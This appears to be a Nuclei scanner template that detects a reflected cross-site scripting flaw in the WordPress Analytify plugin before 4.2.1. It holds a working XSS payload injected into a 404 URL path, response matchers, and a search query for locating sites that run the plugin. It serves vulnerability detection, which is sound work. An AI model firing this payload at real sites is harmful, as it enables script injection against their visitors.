id: analytify-plugin-xss

info:
  name: Analytify <4.2.1 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
  metadata:
    verified: true
    google-query: inurl:/wp-content/plugins/wp-analytify
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wp,wordpress,analytify,wpscan,wp-plugin,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'text/javascript">alert(/XSS/)</script>'
          - 'wp-analytify'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 404

# Enhanced by mp on 2022/09/07
